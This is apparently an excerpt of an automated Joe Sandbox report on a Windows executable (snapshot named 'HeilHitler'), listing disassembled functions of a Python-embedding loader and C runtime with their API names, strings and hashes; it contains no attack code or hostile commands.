                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                            • API String ID: 199729137-653951865
                                                                                                                                                                                                                                            • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                            • Instruction ID: b818f33a4d21ac703cfeb5d339d36cb22e7caedded4b05944280d23af7ad1323
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB22CF64A0DB0BD1FA549BD5B8125B433A1FF15781F942335D82EAA7A1FF3CB198B200
                                                                                                                                                                                                                                            Function 00007FF633D840AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                            • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                            • Instruction ID: 5e1c6efec82dc6ffe275985adce9ceb633183f05f9c94d2148d5fed7e3cc9d72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDB2C372E182928BE7658EA4D4427FD77B1FB54788F406235DA0DABB84DF38B940DB40
                                                                                                                                                                                                                                            Function 00007FF633D6ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                            • API String ID: 0-2665694366
                                                                                                                                                                                                                                            • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                            • Instruction ID: 6aa77f26bc38f440468bbe148275264d742b0de6070f1f26b0bc2a897f68337d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC5202B2B186A68BD7A48F55D459B7E3BA9EB44340F814239E69E97780DF3CD800DB00
                                                                                                                                                                                                                                            Function 00007FF633D6D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                            • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                            • Instruction ID: 43ff3b8166e9fd1da9e9b85cd0cc03098369cc9465b4e54a762af958436dc8e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92317672608B8586EB60CFA0E8417ED7360FB84704F444139DA5E97B99DF7CD648D710
                                                                                                                                                                                                                                            Function 00007FF633D85C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85C45
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A909
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A92E
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85C34
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EAA
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EBB
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85ECC
                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4070488512-0
                                                                                                                                                                                                                                            • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                            • Instruction ID: 6ec99d33bdb44da6ecf2997ad356caa19763f127bc689be6710b0b8447883afe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03D1E426E0824246E720DFA5D8431B96762FF84794F84A235EE0DEBB95DF3CF441A740
                                                                                                                                                                                                                                            Function 00007FF633D7A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                                            • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                            • Instruction ID: d85780c84839de040bc3890f67e64cd2644d1c0eb61610f31f65aaa08a9a8677
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9331A232608F8186DB60CF64E8413AE33A4FB88758F500236EA9D97BA9DF3CD145DB00
                                                                                                                                                                                                                                            Function 00007FF633D81874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                                            • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                            • Instruction ID: 74b5afc23294b8b436fcf21b3ec6f5666c4b3d65eb5e36be9ad9fec28f369967
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85B10762B1869241EA619FA5D4025B9A390FF44BE4F446331EE5EABBC5DF3CF445D300
                                                                                                                                                                                                                                            Function 00007FF633D85E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EAA
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EBB
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85ECC
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855DC
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3458911817-0
                                                                                                                                                                                                                                            • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                            • Instruction ID: 7fd548c5178028af0812a6d8c2f083bf18a1ef2463a1c9129a27f05425390cc1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C518132A0864286E710DFA5D9835B97762FB48784F446335EA4DEBB96DF3CF400A740
                                                                                                                                                                                                                                            Function 00007FF633D6D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                            • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                            • Instruction ID: 5704a215172bdf63649cad887ea3bb25f62a818bf907f5455577448c1c61c217
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26112E22B14F05CAEB00CFA0E8552B933A4FB59758F441F31DA6D967A4EF7CE1649340
                                                                                                                                                                                                                                            Function 00007FF633D83C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                                            • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                            • Instruction ID: d1230eeb0d6ee49713ba1fbf3a28c41d5038889c4296bd78815f040282545d04
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88C10572B1828687D724CF99A04567AB7A1FB84B84F44A234DB4E9BB44DF3DF841DB40
                                                                                                                                                                                                                                            Function 00007FF633D6A47B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                            • API String ID: 0-1127688429
                                                                                                                                                                                                                                            • Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                                            • Instruction ID: 7f355265f457c1e23cbc8f9dfdda7b178116d71c62b86d9ac5c98f9c7d934068
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F1B3B2B183C54BE7A58F58C089A3A7BA9EF44740F455238DA9DA7390CF38E840E740
                                                                                                                                                                                                                                            Function 00007FF633D89728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                                                            • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                            • Instruction ID: 678242f294a982ed2c44e63050c387cca595e72ec0baa18f8897764aa71c8ac5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1B16D73A04B898BEB15CF29C88636C3BE0F744B48F159A21DA9E977A4CF39E451D700
                                                                                                                                                                                                                                            Function 00007FF633D739A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
